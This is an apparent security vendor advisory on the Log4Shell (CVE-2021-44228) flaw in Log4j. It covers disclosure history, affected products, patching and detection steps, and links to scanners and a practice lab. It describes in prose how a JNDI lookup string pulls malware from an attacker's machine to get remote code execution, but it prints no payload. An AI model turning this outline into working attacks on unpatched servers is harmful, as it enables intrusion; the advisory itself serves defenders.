Log4j Update – What You Need to Know

Overview

On December 10^th, 2021, CVE-2021-44228 (Log4Shell) was released affecting the Log4j Java logging framework. This vulnerability received the highest possible CVSS score of 10 out of 10. There have been three other vulnerabilities released related to Log4j since then, but the original is the most critical by far. Initially discovered by Chen Zhaojun, who works for Alibaba’s security team, back on November 24^th, 2021 which was the privately disclosed to Apache. The risk of this vulnerability is so severe, as a precautionary measure, Canada shut down 4,000 government sites. Since the public release there has been reports of millions of attempts to exploit the vulnerability across the world, but as of January 10^th, CISA stated they have not seen any significant intrusions related to Log4j.

So, what is Log4j, what makes it so vulnerable, and how do you exploit it?

Log4j is a piece of software, which most surprisingly is developed and maintained by a group of volunteers, that was coded in Java and logs activity of users on computers. An example of activity that is captured and logged would be navigating to a nonworking link on a web page and receiving a 404 error. Log4j is also used for diagnostic messages in software such as amount of memory being used and user commands entered. The logging of this information isn’t the issue, it’s the fact that the code actively interprets the activity that it is logging, meaning that remote code can be executed. Within Log4j there is a feature called Java Naming Directory Interface (JNDI) that allows commands to be run that are wrapped in ${…}. This feature allows live lookups both inside and outside of your network. With this correct sequence of input, this feature can be used to place malware on the server and have full remote code execution on the host. An example input would reach out to an attacking machine IP on port 9999 and download the malware file that is being hosted.

Products affected

At this time, it’s almost safe to assume that all products are affected as Log4j has been discovered to be deeply embedded in so many pieces of software, even to some that were not aware of its existence. Popular products like Minecraft, Apple’s iCloud, AWS, the NSA’s reverse engineering tool Ghidra, and the list goes on. CISA continues to update their GitHub with a list of known products to be affected.

Detection & Patching

To discover what systems to patch, here are a few steps to take:

1. Identify any internet facing assets.
2. Use authenticated vulnerability scanning to detect devices that have been impacted.
3. If you have an endpoint detection and response (EDR) system, you can use that to search for Log4j files.
4. Determine the version of Log4j being used. Version 2.0 to 2.14.1 are the versions that are vulnerable.
5. Update to the current version 2.17.1.
6. Repeat the above steps on internal IT and OT systems.

To prevent Log4j from being exploited, there are a few steps to take.

1. Search logs for IPs that have known to be scanning for the vulnerability and add them to your block list. A running list of known IPs can be found here.
2. Block a list of IPs that have been used to host a malicious payload to execute the vulnerability.
3. Review the list of IOCs being updated by Microsoft.
4. Review the additional list of IOCs being updated by the Curated Intelligence Trust Group.

Additional links

There have been many articles and resources that have been published since the release of this vulnerability, so in addition to the links in this Security Advisory, nGuard wanted to provide a few additional for further reading.

• If you want to try and exploit the vulnerability yourself, John Hammond and TryHackMe have created a room for you to do so. https://tryhackme.com/room/solar
• A Growing List of Tenable Nessus Plugins being release for detection of Log4j. https://community.tenable.com/s/article/Plugins-associated-with-CVE-2021-44228-Log4Shell
• The team at Huntress has had great coverage and updates, including an open-source tool to help detect the vulnerability. https://log4shell.huntress.com/
• The National Cyber Security Centrum (NCSC-NL) has been maintaining another GitHub repository with a list of information for hunting, IOCs, detection and mitigation, scanning, and vulnerable software. https://github.com/NCSC-NL/log4shell
• CISA Released an open-source Log4j Scanner. https://github.com/cisagov/log4j-scanner

If you feel you need assistance with the detection of vulnerable Log4j instances, have discovered a Log4j related incident, or need general security services related to this vulnerability or anything else, reach out to nGuard. nGuard offers Log4j scanning, consulting services, log management and event collection, and penetration testing services.